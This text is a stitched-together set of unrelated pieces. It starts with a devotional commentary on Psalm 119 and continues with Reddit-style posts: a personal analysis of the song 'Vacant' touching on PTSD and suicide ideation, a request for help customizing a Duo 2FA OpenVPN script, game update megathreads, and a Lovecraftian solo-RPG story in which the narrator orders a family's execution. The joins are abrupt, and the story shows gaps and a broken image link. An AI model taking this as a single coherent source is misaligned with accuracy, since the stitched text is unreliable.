Psalm 119:60: I made haste and did not delay To keep Your commandments.
The Psalmist is expediting his efforts to get back on the narrow path to a life that pleases God through repentance and obedience.
Because the Lord is not slow in keeping His promises and mercy from us when we repent, shouldn’t we put a little hustle in our desire to restore fellowship with Him by putting a little enthusiasm in being restored to His good graces? Barnes notes present an interesting turn of phrase; “When the mind repents of our ill ways then our feet will soon be led back into the way of the Spirit, but the truth is that there can be no repenting until there is deep and earnest thought.”
The dialog in this section of the psalm further describes his acclaimed process of restoration. He made haste and it was without delay, offering no excuse for his transgressions. Under conviction, his response was immediate, not seeking to defer the obligation to turn and go in another direction at a later date. He understood that the strength to overcome was not his. The main difficulty in repentance lies in the fact that the sinner is not usually willing to stop at once, and is not sure that they want to break away from their sins; so, they endeavor to excuse themselves; as they reasoned for a delay; and then they wait for God to do what they themselves ought to do. Here is the truth about sin, the longer we delay exercising it the more difficult it will be for us to overcome it, and the less resistant we become to indulging it.
Psalm 119:61: The cords of the wicked have bound me, But I have not forgotten Your law.
The Hebrew word interpreted as cords portrays a rope or a lariat that tries to draw him into a snare, or net, David states that even if a throng of wicked men entice me and have surrounded me, I will not turn from your Law.
David is not deterred, nor has he forgotten the dictates of God’s Law. Worldly men have laid their snares for him as they do for all believers who demonstrate that their profession of godliness is sincere.
Psalm 119:62: At midnight I will rise to give thanks to You, Because of Your righteous judgments.
If you’re like me and there have been many times in your life when you have been so excited about an upcoming event or fantasizing about your new-found love, the girl of your dreams; thoughts that so overwhelmed you that you were unable to sleep as you cataloged vividly, scenarios ahead. If only we were to get as excited about God as this psalmist has when grateful thoughts about God’s kindness and mercy rummaged through our minds so that they would keep us awake at midnight, thanking our Lord. I am afraid for most of us that late-night prayer is more productive than counting sheep. Sleep comes to easy for me and so I find myself as a person of morning prayer. I am in good company for we read in Mark 1:35 that Jesus was also a person of morning prayer. “Very early in the morning, while it was still dark, he [Jesus] got up, went out, and made his way to a deserted place; and there he was praying.” (CSB)
Did you notice that the psalmist is praising God for his righteous judgments, there is no terror in them for the virtuous? It is like the laws of our land; we rejoice in the laws because they protect the law-abiding citizen.

2020.08.16 03:30 ashspidgeotto Analysis of Echo's - Vacant

TW: subjects including suicide and PTSD
So after taking a nice long rest from all I wrote about Wild Youth acoustic EP I am back to write about something else. I was considering going into the other songs on Wild Youth but I was really inspired to write about a song by Echos. This is my analysis of “Vacant”
Introduction
In the comments section of my second post mrscoggins suggested that I check out Echos. I adore Echos, I often do music swaps with people I meet where we send each other around 10 songs to sort of showcase where we are currently at with what we are listening to. It is meant to feature 10 favourite songs in various different genres to try to give the other person a feel of what music we enjoy. I love this format because I often feel isolated within my own music taste, especially among my friends. It’s also a lot more specific than me telling them I enjoy EDM. Echos seems to always end up my list in my most recent shares and honestly there aren’t many sounds out there I can even put in the same category (mind you I tend to avoid using genre labels as it is)
Echos released “Even Though You’re Gone” in 2018 and I know it’s been expressed in different interviews that this album is a letter breaking down a relationship with one person and the grieving process. Going back to my old breakup playlist from last spring/summer I wasn’t surprised to find some of these songs featured on it. As I mentioned earlier in my previous posts a beautiful thing about music is that we have the ability to interpret it and apply it to ourselves in a way that we desire or even need at the time. While looking at my breakup playlist I also found “In Flames” which I recently wrote about in a whole other context this week. I was pleased to rediscover this addition to my old playlist because I feel it truly speaks to how dynamic music is, our understanding of songs may change over time, there is no right way to interpret them and I really try to demonstrate that as I dive into these songs.
As I’ve mentioned before, the theme of 2020 for me has been rebuilding myself as I battle through my PTSD, without getting too personal, in ways it’s quite unfortunate that our mental health systems are so broken and disconnected right now that I’ve had to really find the strength in myself to both navigate how I need to heal and then apply those strategies to heal myself. That’s not to say that even within functional mental health services we don’t approach them with a similar strength and need to self heal, but when you are stuck navigating trauma on your own it adds elements of complexity that could sometimes easily be remedied with better more efficient systems. I could write about this (and have previously) alone for hours, but that’s not what this post is about. Regardless, my main point with this is that music has been a very important key for me in navigating this and I doubt I’m alone in this.
I switched over to spotify in 2020 and before that I was mostly using youtube, I have a large library of playlists but they were all fairly chaotic and disorganized and I kept losing songs I really enjoyed because there was just so much. Spotify has really helped that, but on spotify I also have a giant playlist where I sort of dumped all of my chaos from the previous youtube playlists. I remember one evening during covid isolation after a pretty draining battle with an episode of depression I managed to get myself up and get into the shower. I threw on that chaotic playlist I had made on spotify and put it on shuffle. “Saints” by Echos came on and it was one of those moments where I rediscovered something I had lost and I remember in that moment having to get out of the shower to replay the song a few times so that I could really process all of the sounds and lyrics I was hearing. At that moment I rediscovered Echos, and it didn’t stop at “Saints”
On later dates I want to dive into more songs on “Even Though You’re Gone” but today I am focusing on Vacant because this song has been the most “loud” song for me (This may be a weird way to use the term “loud” but when I say loud I mean that the lyrics hit me with so much raw emotion that it’s really hard to block it out. It’s almost like an emotional wake up call.) “Loud” songs have been important on my journey with PTSD, because like others who experience it one of my symptoms has been chronic emptiness. I would get many days where no matter how much I wanted to feel ANYTHING everything was just shut down. Music has been one of the first ways that I was able to recognize my emotions were starting to operate again. There were times in my life where I would avoid these “loud” songs, but it really swapped into me seeking these songs out so that I could feel things, raw, real emotions that I wasn’t used to anymore and that I missed.
I’ll jump into the song momentarily but I need to explain one more aspect of the framing. As I mentioned before I don’t really like using genres to express music. The idea of putting songs and artists into categories or single world labels seems to be very protested by the way my brain operates, music feels too complex to be generalized in this way, I know others enjoy genres but I really don’t. Maybe it’s connected to my neurodivergence but I feel very similarly about emotions. It’s hard for me to find a single word to really express what I am feeling. This is why music is so important to me, I can’t summarize what I am feeling with a single word but I probably can with a song and I definitely can with a playlist, and if someone needs a label for what I am feeling I tend to work backward from music to try to summarize what I am feeling with a label associated with the song/ playlist summarizing what I am feeling. In case anyone is interested I am going to include two playlists I have on spotify that feature this song. I have dozens of private playlists that serve this purpose, I’ll speak of that more after my analysis.
Anyway, Like other songs I’ve written about I approach Vacant in the context of my relationship with myself. When we look at a song like Vacant I can understand a cause for concern around the idea of delivering this messaging to yourself. I’ll get into it in more detail but I wanted to briefly explain that although there is a lot of raw anger in this song I think it’s extremely powerful when applied to self. It’s a wake up call from yourself to yourself, and as you go through my entire framing you will likely see that deep down, behind all of the raw anger it’s portrayed as a compassionate but much needed wake up call.
Vacant Summary
I’m going to quickly rewarn you that the concepts in this analysis are a bit dark/heavy so I apologize if this is unsettling for you. With that being said I think these types of feelings really need to be spoken about, it’s hard to address them as people stay silent.
As I mentioned before I frame this as a song to myself. This is a song to myself coming from a very powerful part of myself. I frame this as a song coming from the very small, fragile part of myself that holds my will to keep surviving but more importantly to keep living. This is a part of myself that often didn’t really get acknowledged within my overall self. Especially when we throw PTSD into the mix when I am void of emotions it’s hard to feel any emotions, even the ones from the place where this song comes from telling me to keep going. Everything is numb but through that numbness sometimes we can overcome it from within and when we experience those moments they are extremely powerful. This song captures one of those moments for me.
I am going to divert a bit briefly to express that as I am able to process and articulate these emotions in some capacity, this is important because by doing this it becomes easier to replicate them as needed. Because I’ve documented my experiences with these moments, I can start training my brain to search for more of these moments and even replicate them. Like I said before music is extremely powerful because my method of achieving that relies heavily on music.
This song for me captures a very important moment, from start to finish is that piece of myself gaining more and more strength as they confront the rest of myself about what has been going on. It’s a letter to the rest of myself to help them notice this very important piece that was going unnoticed. It expresses all of the frustration with myself, and even spans to express vengeful thoughts about myself all in an attempt to help me understand. Through all of those emotions it’s me trying to save myself and that comes from a place of compassion, an almost desperate attempt at self preservation, and an attempt to give myself a wake up call so that I can adjust my approach to life. A call to get on board with fixing these issues because we are starting to realize the impact it is having.
Specific Lyric explanations:
“I've been waiting for you to get your mind right”
This is a very good intro to this conversation but most of that will be explained later in the song. We are pointing out that we gave ourselves time to sort this out before we initiated this confrontation, or perhaps that something has triggered this dialog at this moment where as before we didn’t feel it would be effective.
“Pour yourself into my skin until I can't see”
This line is loaded. I have been approaching it from a few different angles and the best framing I see is to take this conversation with as much empathy and active listening that we can manage to muster up. Listen so deeply to the subject matter we are diving into that you can feel it from the inside all the way out until our skin. Be as present as possible. I absolutely love this because by even stating this we know it’s such a large demand. When our emotions are off we know that feeling anything is a constant struggle, but we are asking ourselves to find the strength to do this, for the duration of this message, be as present as we can because this is important. I think in the “until I can’t see” part references grounding. If anyone has experienced dissociation it is often portrayed with imagery of watching yourself from the outside and having no control. I think this reference of being so grounded in ourselves that we can’t see ourselves from the outside anymore because we are so connected and ready to hear this message we aren’t just seeing, we are feeling. We are feeling our own point of view, it’s not just some far away concept it’s real.
“You’ve been runnin' from yourself for a while”
This is a reference again to what I mentioned in that last line, the concept of being disconnected from self, and this is acknowledging it’s been going on for a while.
“Waiting for the whole thing to catch fire”
I think this line captures places of self sabotage and I also think it captures aspects of suicide ideation that aren’t always spoken about. I’ve touched on this in previous writing but often with feeling suicidal it isn’t direct immediate feelings or impulses to die. It’s a lot of framing of “I’m being destructive or reckless and if it harms me whatever, I don’t care” it’s that lack of care for life versus the compulsion to purge yourself. I think these feelings are especially important to note and recognize because there are clear steps in addressing them, they also tend to be the thoughts we are able to safely deconstruct compared to the thoughts that have thrown us into full crisis and into a space where we aren’t really capable of giving ourselves the internal attention we desperately need.
“You think that if you burn down you'll be fine”
Similar premise to the previous line, this illustrates feelings of feeling better off if that’s the outcome, not deliberately setting the fire, but feeling fine with that being the repercussion of the flames.
“And maybe I'd forget all the times you lied”
This one is fairly important for me, I tend to approach these feelings with avoidance, and avoidance tends to go hand in hand with lies. Especially lies to self. I feel this meme:format(webp)/cdn.vox-cdn.com/uploads/chorus_image/image/49493993/this-is-fine.0.jpg) really captures this plus the other 2 lines quite accurately. We tell ourselves it’s fine so that it becomes easier to tell others we are fine too.
“I'm sick of awaiting your vacancy”
This line really articulates the feeling of being fed up with not being present. I’ll get to this more in a future line.
“I hope that you choke on your vacant teeth”
I love this line so much. I will try my best to express why but this is honestly difficult to put into words. Imagine someone choking on teeth that aren’t there. If someone were to choke on “teeth” they would have to be solid. In a dissociated state we don’t feel ourselves, we don’t feel our teeth, in order to choke on our teeth they would have to become a solid form we are aware of. So we are basically hoping that we sense the presence within ourselves and it impacts us in a way that impacts our ability to keep existing in that capacity. BUT that’s not all. As I said before we often lie to ourselves about how we are feeling so it becomes easier to deliver those same lies to others so that they don’t focus on our pain. I picture the teeth we expose through fake smiles signalling that we are okay. In this same loaded line we are hoping something shifts in us and causes us to choke as we exhibit these fake smiles, The teeth we are exposing in these smiles are vacant of representing our actual emotions. It’s a hope that one day it becomes too much and we realize we need to address it. Like I said, I love this line. It’s all packaged in something that sounds like an aggressive threat, but when you unpack the message it is again from a place of concern for self and self understanding around knowing that we are void of emotion so it will take something like this to actually jolt them back on.
“No space in your broken veins left for me”
I also love this line, veins are life lines in our body. This is an acknowledgement that those lifelines are damaged and at risk. We need to mend them but they are so broken right now we don’t have the ability to let in what would help mend them, we can’t feel them, we aren’t there.
“I know that you're empty, I know that you're empty, yeah”
This is my favourite line in the song. It wraps up all of the other metaphors in previous lines. Until we reach this point in the song we can’t fully grasp all of the layers to the other lines.
If you read every line you can follow it up with this one. What I most love about this line is this is the effective avenue we can use to deliver this message to ourselves. We might not be able to feel or understand the other things in this song, but we know that we are empty. Knowing that we are empty in itself is such a specific experience. Feeling empty is a paradox.
Again another concept that is very hard to articulate, I apologize in advance because this gets a bit meta. You are experiencing a lack of emotion. One day you eventually reach a point where you realize you are experiencing a lack of emotion. What is your emotional response to noticing the lack of emotion? If it’s sadness that may quickly shift to happiness and appreciation because through being upset about experiencing nothing you are now exhibiting something and that response would solve the issue. Your response to lack of emotion is likely more lack of emotion which brings you to a place of great understanding that you are not feeling anything.
What do you do? Alternatively instead of feeling (because as you already know you can’t do that) you may start conceptualizing what you SHOULD be feeling if your emotions were operating. It’s the entire logic part of your brain driving the process of trying to draw on what you would be feeling if your emotions worked based on your past experiences. By this notion your emotions are operating from a place of logic. This logical place you operate from is key to navigating life while feeling empty. If you can hypothesize how you would feel if your emotions worked you can express those notions to yourself and others to navigate with a very specific perceived efficiency.
As I stated in a previous line, we lie to ourselves about how we are feeling, but that isn’t entirely accurate. We tell ourselves what we would be feeling based on these hypotheses. Because we feel nothing, all we have to reference is concepts of emotion we think we’d feel in their place.
At some point in this process you will probably decide that you want to make a shift from trying to logically decide what you should be feeling into a place where you are trying to figure out how to turn these emotions back on so that you can feel them authentically. (it’s probably a similar place in yourself that is delivering the messages in this song) How do you make this shift if you don't have emotions driving the urgency to turn them back on? If this is your first time navigating this experience it won’t exist in your past experiences so you can’t draw from them to reach this outcome logically. If your emotions are off you don’t even have the ability to be concerned about the lack of emotion because that lack of concern probably doesn’t exist in your past experiences. You would have to reach a place of concern somewhere in the logic side of your brain in order to even reach a place of troubleshooting how to turn them back on.
How do you decide you want to turn them back on? You generally don’t, I’ve spent so much time on this concept in my head and it generally goes in circles. We can’t rely on our lived experiences alone to get to a place of knowing to turn them back on. By this notion they aren’t turned off because we intentionally don’t want to feel (though this may be why they were originally shut off) they are still turned off because we aren’t aware that we want them back on. We are so distant from ourselves that we can’t process the feeling of wanting them back. (I know this is a lot, I hope you are still with me)
If you can’t rely on internal factors and experiences to guide you to the decision to make this shift you'll have to rely on external ones. The problem with external factors guiding you is you don’t have control of them. You can’t ask for them, they just appear in our lives. What I’ve found though fortunately is that external factors can bypass the need to want to turn them back on and instead help ground us in our emotions turning them back on. Sometimes we face an external experience that jolts us into feeling something.
You start noticing that through present external factors you aren’t in your logic brain and you are actually feeling something. This can be tricky because if it’s something in line with your hypotheses you created (that are generally very accurate) it may even feel artificial. We may not even be aware that they have actually switched to operate in a place of emotion. For this reality to really sink in we need an external factor to express to us our own feeling of being empty. In the exact moment by feeling concerned about feeling empty we no longer feel empty in that capacity. (similar to what I expressed when I said the feeling of knowing you are empty may result in sadness, and because sadness is an emotion it negates the feeling of being empty)
This songs line creates that paradox.
When we hear “I know that you’re empty” It’s this process I just outlined happening in a blink of an eye. Once this emotion is sparked in us we can work backward through the song to slowly start to understand what we are saying to ourselves, because with that spark, our mind can start processing our response to feeling empty, and start working on ways to negate that in other capacities. It makes the concept of empty multidimensional in the sense that we now understand that there are different portions to this feeling. By making this connection we have figured out how to negate this feeling of emptiness, and that can be applied to other areas.
That split second realization that you are feeling empty can be utilized by the piece of self expressing this song's message to help get all of the other messages in here across. It’s urgency, compassion and action all in one very loaded yet somehow simple line. Fulfilling the request of the second line of the song as we process it.
Emotions can be overwhelming but by this experience happening we now have a reference point in our brain if our emotions were to shut down again. This allows an avenue to troubleshoot in logic mode. Every time emotions shutdown and we need to troubleshoot in logic mode we have new scenarios recorded in our brains to access as reference points giving us higher odds at turning the emotions back on and understanding the value of having them on. We also gain access to potential understanding of our own patterns in emotions shutting off and on.
I know that was a lot. I hope it makes sense, because honestly that was one of the hardest things I’ve ever tried to articulate in words.
“You don't even look the same with your brand new eyes”
This is the line following the first “I know that you’re empty, I know that you’re empty yeah” and to me this references the gradual realization I mentioned from that line truly sinking in, because every time it’s repeated I view it as another dose of reality really driving home the connection to that feeling. “Brand new eyes” references that new viewpoint of this connection, and this is a notion that that connection is the driving force getting us out of the overall expressed situation.
“And you drained the light out of yourself and now you can't see”
This references the newfound awareness of knowing that our way of living is essentially killing us by draining all of the light from us. “And now you can’t see” is another multidimensional notion.
The obvious one being that we were unaware of the light leaving but that would likely be phrased differently as we are currently talking about the present. In the second line the song references “ Pour yourself into my skin until you can’t see” That was referenced as a request, and it reaffirms that the requested process of grounding ourselves in emotions is truly happening. At the same time it is also referencing that our old views of our way of living (especially operating from inauthentic emotions populated by our logic brain) isn’t even an option anymore. The part of us delivering this message (our will to live) has taken control. We are essentially taking the will to live and overpowering the will to just exist. The progression of our awareness of our own situation is fueling our will to live by using this new found ability to feel again.
Personal Playlists this song appears on:
I previously mentioned my private spotify playlist that I create. These lists are very incomplete but as songs come up that bring on emotions I try to place them with other songs that give me similar feelings. I’m not going to link the private playlist but I will list what else appears one each one in case anyone is curious. I am open to song recommendations but I ask that you please don’t recommend specific songs for specific playlists because that whole process is very personal to my own emotions.
Valid: I place songs in here that honestly deliver very specific emotions in a wide variety of ways.
  1. Mia Vaile - Sweet Liar
  2. YAS - empty crown
  3. Porter Robinson - Sad Machine
  4. Au/Ra, Alan Walker - Ghost
  5. Alison Wonderland - Peace
  6. Matoma - Sunday Morning (feat. Josie Dunne)
  7. Echos - Vacant
Empty: this was created to train my brain. When I am noticing signs that I may be feeling empty I put on this list in hopes of validating that feeling. The hope is by validating the feeling it will spark that paradox I outlined earlier about feeling empty and how that triggers other emotions erasing the feeling of being empty.
  1. Au/Ra, Alan Walker - Ghost
  2. Max Leone - Cautious
  3. Sub Urban - Cradles
  4. Vorsa - runaway
  5. Echos - Vacant
Conclusion:
I want to conclude by saying that these concepts have been extremely important for me in navigating my own experiences with shutting emotions off and on. I previously remember hearing from a mental health professional that humans are unable to control when they turn their emotions on and off but I would highly disagree based on these experiences and these concepts. That aside, this song has been very important in the sense of it being an external factor grounding me in my emotions and these concepts are exactly what I mean when I say a song is “loud”. I don’t know if these framings are useful for others, but I hope they can be utilized to help others with their own experiences.
As I was writing this, I did realize that I'm not exactly sure if this is the best subreddit to be posting these analyses. I've had an account for for quite some time but I generally haven’t really been posting. If anyone knows a more suitable place to be posting these I am most definitely open to suggestions and direction. I used to write a lot of these as a teenager but I never actually posted them anywhere publicly. If there is enough interest maybe I’ll dig those up.
Thanks for reading. I’ll likely be posting again soon.

2020.06.26 20:23 Stuxnet15 DUO 2FA for OpenVPN Access Server - python script customization

I'm trying to customize this python script, but unfortunately, I know more about mining astroids around Saturn than python.
When connecting to openvpn through the windows client, you insert your username and password. Then this scrip takes over. It pops up a message that says "Duo passcode or second factor:" It expects you to type in your Duo 2fa number, or "push", "sms" or "phone"
You can see the code on line 534, where it says "msg = 'Duo passcode or second factor:'"
Rather than having to type in "push", "sms" or "phone" for those types of 2FA, then clicking SUBMIT, I'd like to add some buttons below the text box that will automatically send the desired 2FA. Their functions would be basically auto-completing the text field with "push", "sms" or "phone", and clicking submit.
Gold to anybody who can help me get this working.
Thank you!

2020.04.16 02:59 Pyrotios [67th Dungeon Update] Megathread

We have no datamined date for this one, so I can only guess at when it will go live. Since none of the recent months released DUs later than the 15th (PST), and that's today, that's my guess. This is the last DU for which we have a corresponding JP megathread. Yes, there is only one realm this DU. Yes, this realm was in the last two DU. Yes, this realm is in next month's DU.
ETA: - 5pm April 15 PST or 1am April 16 UTC. 5pm June 4 PST or 1am June 5 UTC.
Previous DU Megathread: Dungeon Update 66

2020.02.09 23:11 Pyrotios [65th Dungeon Update] Megathread

We have no datamined date for this one, so the ETA is just my best guess. Right now, that guess is any of 4 days: February 11, 12, 18 or 19 (5pm PST) or February 12, 13, 19 or 20 (1am UTC). February 19 is also a strong candidate for maintenance, so the DU could even arrive with the end of maintenance.

2020.01.04 21:29 Pyrotios [64th Dungeon Update] Megathread

We have no datamined date for this one, so the ETA is just my best guess. Half-stamina realm dungeons continues until January 11-12, so my estimate is that the DU will drop 7 days before that, approximately 4.5 hours after this is posted. Incidentally, half-stamina realm dungeons end at the same time as most of the fest content.
ETA: - 5pm January 4th PST or 1am January 5th UTC. 5pm January 15th PST or 1am January 16th UTC.

Did anyone else frequent MrFixitOnline back in the early days of AOC/ AOK? It's been gone for some time, but using the wayback machine I found a few links that might evoke some Nostalgia for long timer players, or at least be interesting to younger players how folks were thinking about the game roughly 20 years ago. I'm sure most of this is out of date, but still an interesting read.

2018.10.11 18:57 solorpggamer [Actual Play] Lovecraftian game w/ Human Oracle

This is an old actual play of an experiment I was calling a “Human Oracle”.
If you’re familiar with Mythic GME, you know that it has a system where you roll two random keywords (action/subject) and interpret that into an answer. A “Human Oracle” would be one or more persons who would give you two keywords from the same list when you ask for it (or would answer YES/NO from a close ended question). No other input from the “Human Oracle” is permitted. Sometimes the keywords are randomly picked from the list and sometimes they are consciously chosen with the purpose of influencing the game in some way. The trick is that the player is not supposed to know whether the keywords are random or handpicked with purpose.
The reason I played this way is that I wanted to find out how it would feel to know that an actual person might be influencing your game in whatever small way a pair of keywords allows that to happen.

----------OLD Lone Wolf Roleplaying POST------------
I decided to use +Geoff Osterberg's Oculus oracle for this game:
https://docs.google.com/file/d/0ByVeZxlFO74FWTZTQkJrUUNtZW8
It's free, and is attached to a very cool game. I'll only be using the Oracle part, though: yes/no questions with Odds, and complex questions that should be answered by picking a Focus word and Lens keyword (these are equivalent to Action and Subject keywords in Mythic). For yes/no questions, I will declare the odds, and GMs either roll for me, or they make a ruling based on their own judgement.
As per the rules of the group, keep your answers to the format of the oracle per the kind of question asked. In the case of complex questions, you can try to get your meaning accross in that limited format, which could be interesting as a GM, in case you decide not to roll randomly. Keep me in the dark as to how you pick an answer. :)
For the RPG part, I will be using a free and very simple nano-game called Mythos Tales:
https://www.drivethrurpg.com/product/111135/Mythos-Tales
I don't think the GM duties can be distributed among people unless you all share some information, so I will bypass that for this game as a convenience. As such, I'll keep the system stuff having to do with the dice pool visible (see game text, it's pretty cool). All GMs have to worry about is answering my questions regarding the fiction, per my request above. You probably never had an easier time GM'ing! :).
[OOC stuff will be between brackets]
So, let's get this started!
__________Player Turn_______
Alex Yari
My name is Camilo Fermaint. Remember my name, for the world will come to know it and respect it.
[*1d6: 6. I have to stop right there per the rules, since I described a man (in a very short way!) and got a 6 on my first roll. This is likely to be an extremely short game. I'll have to add more detail after the scenario starts, but it won't be of any mechanical benefit.
Complex Question: What is the starting scenario? Give me a Focus and a Lens keyword. :)*]
______________Human Oracle Turn___________
Chris Stieha
Focus: Reassure
Lens: Travel
[I saw you posted this earlier today and didn't want you to be held up in your experiment. If someone comes in and wants to be fulltime GM, that's fine. Also, if they want to collaborate via googledocs, I started one.]
__________Player Turn_______

My brother, Gabriel, had reassured me it was now safe to return to our country.
I had emigrated to Florida in my early twenties, in the immediate aftermath of the fall of Carlos Ballesteros' regime. My family was able to escape, with a good portion of the country's treasury, thanks to my father's friends in the CIA.
I never had a chance to come fully into the powerful position I was being groomed for. At first, I hated the revolutionaries with a passion so dark that I became sick. Now, fifteen years later, I thank them, for it was Destiny. I knew I would wield real power beyond what I had imagined as a foolish twenty-something.
[I will now try to speed play by scripting a few questions. Hope it works. If you see any errors, let me know and I'll fix.
I also have comments for Chris and potential GMs at the end. :)
  1. Are the revolutionaries still in power? If yes, continue to #2. If no, skip to #6.
  2. Are they a repressive regime as well? Continue to #3.
  3. Are they well loved? If no, continue to #4. If yes, skip to #6.
  4. Are they corrupt? If yes, continue to #5, else skip to #6.
  5. Have my brother and I, through demagoguery, succeeded in casting ourselves as the antidote? Continue to #6 regardless of result.
  6. Complex Question: who is behind the push to get me back into the country?

Chris & the rest of our members:
The way I look at it, for this game at least, is that whoever gets to a question first gets to answer it regardless. I suppose Players can request only one GM if they both agree and that'd be an interesting setup as well.
For my part, don't worry about holding me up. I view this as a very leisurely game where I can answer on the train in the mornings, or whenever I have some free time. Don't worry at all!
Also, since I'll be taking care of tracking the RPG system's GM bits, all you need to focus on are my questions. You can keep some common document if you think that will be fruitful. The only thing I worry about is that since so much is in the control of the Player, the best a GM can do is try to nudge them when they ask binary questions, or direct them in very broad directions when answering complex ones. Still, feel free to experiment, that's what this is for!
Also, don't be afraid to start new games. I think GM'ing here is super easy, and I'll be happy to answer oracle questions whenever I see one (if I get to it first and the player hasn't requested a 1 GM maximum).
Cheers!]

[If you don't list the odds, do you want us to assume undetermined? You initially say you will declare the odds, so I didn't want to decide the odds for you.

When the June 3rd Revolutionary Army had no longer been an obstacle, Gabriel had volunteered to go ahead in order to pave the way for me. I never had a doubt that we would find capable people sympathetic to our cause, so I was not afraid to let him.
Now at last I was back in my old country. When I at last laid eyes on my motherland...

When I, at last, laid eyes on my motherland, a fleeting but confusing sense of shame and doubt invaded me. The conditions were better than they had ever been during Ballesteros' time. The airport and the surrounding area were in better condition than they has ever been during our time as the ruling class under Ballesteros.
When Gabriel met me in his private Mercedes SUV, he must have understood what I felt.
"Wait until you see what that ragtag mob of dogs was able to do," he said with an ironic smile. "Well, they had some help, manito."
I knew what he meant. I still hated that they got any credit at all. Specially since the help was a secret and it involved neither the Americans nor the Russians.
As we drove through the town towards our destination in the countryside, I noticed the stark differences between the past and the present. The improvements in infrastructure were fantastic; almost first world. Yet, there was something unsettling about the vistas as if some dark, fearful secret were hiding behind the mask of propserity.
When we had finally made it to the country side manor where we would meet my father's old associates from the Ballesteros military. I knew they did not hold the same powerful ruling positions, but they were still men of means and influence. As long as they fullfilled their duties, that would remain so. Something the ragtag rebel leaders seem to have forgotten.

The manor was menacingly quiet upon our arrival. Despite a distant feeling of trepidation, I followed Gabriel inside. My ambition has always been greater than my fear. Upon entering the place, I was greeted by Don Omar Sevilla, one of my father’s friends. He said they were waiting anxiously for me.
I was brought into a hall, in which a man and his family were surrounded. The man and women were roughly in their mid forties. The children could have been no more than eight years old. The man was a traitor. We all knew the penalty for betrayal: death to the traitor and his seed.
They were all waiting for my judgment. Don Omar looked at me meaningfully. I lowered my head slightly in assent. That's all it took. I never saw the terrified family again.
Alone in my room that night, I was wrestling with a sense of self judgement at the lack of remorse I felt. What was I becoming?

That night as I was writing in my diary, I fell asleep. I became conscious of the room becoming cold like a Winter New England night. I told myself I must be dreaming as there is no Winter season this close to the Equator. Yet it felt all too real.
Finally I saw them, my victims from the evening. Their eyes empty and horrible. Yet the children beckoned me to follow. Somewhere a part of me understood they were messengers from the Power I had sought so much. My heart cowed and wondered at the same time with what had suddenly dawned on me: this Power had sovereignty over your existence beyond the grave as well.
That the parents had given over their children to It offended me. Wasn't being fated to be a slave in the afterlife worse than death? Yes, I was better than them, I reasoned. This is why this ancient Power would now conspire to reward me beyond what anyone at the manor expected.
I followed the ghosts of my victims to where I was being summoned.

As I left the room, I saw myself sitting on the desk, scribbling furiously the document you're now reading. It was as if my spirit was detached from my physical self. I, again, could not tell if this was dream or reality, but I followed them.
The ghosts led me outside the manor out onto the nearby mountain. I should not have reached the top were it not for the aid of the servants who showed me the secret paths. What I first thought to be the mouth of a cave, turned out to have been a protrusion; the work of something other than nature. There was fresh earth around it as if an earthquake had brought it to the surface.
Though I had not seen it yet, I felt like the place was a barrier to life; a Hades. I should not have been able to enter it alive without the service of the enslaved spirits.
[Complex question: What is the place like inside?
Yeah, I think that the Mythos Tales mechanic is ideal for a solo writing game. You just kinda let your imagination go, and when you happen to do something that requires a roll, then you consult the system. The only drawback is that the end can be quite abrupt if you hit a 6.

As I descended further, the halls became more twisted and confusing as if there was an otherworldly geometry at work*. It also looked darker ahead so I took one of the torches lighting up the previous passages. There were more etchings on the wall the deeper I went, but the change I saw startled me: I could see representations of previous people, and Ballesteros was one of them. These were all the ambitious men and women who had sought out this entity and received something in return. It was evident from the etchings that these people went back to Spanish colonial times, and beyond into the time of the Amerindian empires of this region.
My human instincts seemed to warn me of its malicious, maybe even hostile nature. I now wondered what price would this being exact in any bargain and doubted whether I wanted to proceed.

I could feel the presence of this entity all around me, but I could not see it. When it spoke it was like no earthly sound I had ever heard. It offered me everything I ever wanted and even desires that I wasn't conscious of.
My fear changed back into lust for that power. I would have given my very soul for it...and that is exactly what it wanted. It said I could still refuse, but by doing so I would be choosing oblivion as there was no life after death despite what our ignorant religions said. I could have eternal life by serving him.
Decades later, near the twilight of my life and at the height of my earthly power, I found myself filled with dread of the afterlife that awaited me. At that moment, however, I accepted the bargain, blinded by my lust to the suffering souls I saw in this realm. How could I not? It was everything I wanted on Earth.
Immediately after accepting the bargain, I found myself passed out on the room's desk, with my diary full of the strange etchings I had seen as if I had been in a trance for a time. The clock had only advanced minutes. Later in the early twilight I went through the 'magical' ceremony that the so called sorcerers that had planned my arrival here had prepared along with my brother. {*} I thought I saw something indescribable, like the depiction I’d seen in my dream like trek. Perhaps it was mocking these people, or maybe it was mocking me.
Decades passed, and I enjoyed absolute power over that land. Not even the most powerful countries dared to try and meddle in my country’s affairs. I truly savored all that was in my hands, until I felt the end creeping ever closer. Then my outlook changed.
I desperately sought a way to break this Faustian pact. I earnestly sought forbidden knowledge in secret though I knew not if the secrecy was in vain.

We arrived without incident at the mound. I saw signs of recent excavation and assumed my men must have been here.
I heard chanting noises as I approached the gaping mouth of the earth and thought that maybe the locals had come here to worship Allah. Or perhaps some rebel sect had kept alive a cult from their long gone pagan past. Why would they be here?
My imagination immediately presented me with scenarios of violence. Among the men I sent were many capable soldiers. Had they been overpowered?
The men I brought with me hesitated at the entrance. As I walked on forward through the tunnel their irrational dread was palpable; one by one they began to desert me. I pressed on cautiously, even as the last man fled in fear. He pleaded with me to follow him out of the evil place, but I dreaded my fate more than the dark of this place. The book I sought was my only chance at salvation.
Slowly, I crept on forward with my latern, alone. The light showed me no no signs of the men who had disappeared. I lost any sense of time as I winded my way deeper into the mound, and a notion that the chanting was surrounding me began to take root in my mind. It kept me company until I reached an empty wall.
I sat down before the wall for I know not how long. I was waiting for something and it eventually arrived. I understood the chants as if a power decided to open my mind. All human meaning and purpose left me at that moment for it was a terrible truth; alien and terrifying. No human point of reference or thought structure that can hope to embody this aberration.
I now find myself alone in this empty tomb alone with my regret and these unhinged notes I've written. My final minutes tick away in wait of my eternal and terrible master.

Thanks man! Your doc is actually helpful. The only part where I seemed to have guessed right about you taking control was during the ghostly visitation. Most of the time, I just couldn't tell. You actually kept it very balanced as far as when you took control and when you delegated to Oculus.
I think that the Chinese Box experiment comment provides some insight as to how it may feel. I suppose that delegating to an oracle wasn't that much fun. Maybe taking control with limited tools is only marginally more fun.
How did you actually feel as far as like fun level? Is this way of "GM"ing something that you would enjoy doing at all, even if you didn't have to delegate to an oracle at all?
See, I'm envisioning a web or network program where you have an oracle built in, and also people dropping in to GM in the way you did. Maybe when you log in to GM, you're presented with a queue of questions from one or many games (something you could adjust), and then you are given a time limit (set by the player) to answer. If no one answers, then the Oracle randomly does so.
